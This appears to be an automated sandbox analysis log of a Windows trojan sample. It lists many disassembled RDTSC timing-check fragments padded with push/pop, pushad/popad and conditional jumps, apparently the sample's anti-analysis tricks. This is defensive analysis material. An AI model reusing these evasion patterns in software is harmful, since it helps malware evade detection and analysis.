Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D78DA9 second address: D78DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D78AAF second address: D78ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F3620DC90F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D81CB5 second address: D81CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80463 second address: D80477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9100h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805DF second address: D805E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805E3 second address: D805ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805ED second address: D805F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805F3 second address: D805F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D805F7 second address: D80609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jnc 00007F362081F596h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80609 second address: D8062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9106h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C2A second address: D80C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C2E second address: D80C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C34 second address: D80C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80C40 second address: D80C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D80F3F second address: D80F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F362081F596h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D81993 second address: D81997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D81997 second address: D8199D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8199D second address: D819BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3620DC90F8h 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F3620DC90FCh 0x00000014 jp 00007F3620DC90F6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D819BF second address: D819C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D853D3 second address: D85405 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3620DC90F6h 0x00000008 jmp 00007F3620DC90FBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jno 00007F3620DC9108h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D85405 second address: D8542B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A5h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F362081F596h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8542B second address: D8542F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D88F72 second address: D88F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D88F78 second address: D88F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F3620DC9108h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8966A second address: D89670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D89670 second address: D89674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D89674 second address: D8967A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8967A second address: D89680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D89680 second address: D89686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D897C5 second address: D897CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D897CB second address: D897E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D897E5 second address: D897EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8F5C9 second address: D8F5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F362081F59Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8F5D6 second address: D8F5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB26 second address: D8FB34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F362081F598h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB34 second address: D8FB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB3C second address: D8FB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB40 second address: D8FB71 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F3620DC9103h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F3620DC912Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007F3620DC90F6h 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D8FB71 second address: D8FB8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F362081F596h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90420 second address: D90424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9071F second address: D9073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9073B second address: D90759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3620DC9109h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90759 second address: D9078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jnp 00007F362081F5C2h 0x0000000d ja 00007F362081F59Eh 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F362081F5A4h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90AA8 second address: D90AB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3620DC90FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90AB2 second address: D90ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90ABC second address: D90AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D90D79 second address: D90D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F362081F596h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D91363 second address: D91376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC90FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D937BC second address: D937EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 jnc 00007F362081F59Eh 0x0000000d popad 0x0000000e push ebx 0x0000000f jmp 00007F362081F5A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D937EC second address: D937F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9C3F2 second address: D9C3FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F362081F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9C3FD second address: D9C40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3620DC90F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B6B8 second address: D9B6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B6BD second address: D9B6DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9108h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B826 second address: D9B82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B82C second address: D9B858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9106h 0x00000009 popad 0x0000000a jns 00007F3620DC90FCh 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9B98E second address: D9B9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b jl 00007F362081F59Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BAC6 second address: D9BACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BC5C second address: D9BC62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BDCD second address: D9BDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9BDD3 second address: D9BDD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9C109 second address: D9C113 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4C2 second address: D9F4DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F362081F596h 0x00000017 jnc 00007F362081F596h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4DF second address: D9F4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4E3 second address: D9F4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4E9 second address: D9F4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jnl 00007F3620DC90F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F4FC second address: D9F501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D9F501 second address: D9F51C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F3620DC9105h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5AF4 second address: DA5B22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F362081F5A0h 0x00000008 jmp 00007F362081F59Ch 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F362081F59Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5B22 second address: DA5B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5E09 second address: DA5E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A3h 0x00000009 pop edx 0x0000000a jnl 00007F362081F5B9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA5E50 second address: DA5E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9102h 0x00000009 jmp 00007F3620DC9105h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA63EB second address: DA63F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA63F1 second address: DA63F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA63F6 second address: DA643C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F362081F596h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f je 00007F362081F596h 0x00000015 jmp 00007F362081F5A7h 0x0000001a pop eax 0x0000001b jnc 00007F362081F5A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA643C second address: DA6446 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3620DC90FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA6446 second address: DA645A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F362081F59Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA65AD second address: DA65D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9107h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F3620DC90F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA65D3 second address: DA65E2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F362081F596h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA65E2 second address: DA65F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F3620DC90F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DA74E9 second address: DA74F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC0D17 second address: DC0D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F3620DC90F6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F3620DC9102h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a jmp 00007F3620DC9109h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: DC0D59 second address: DC0D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
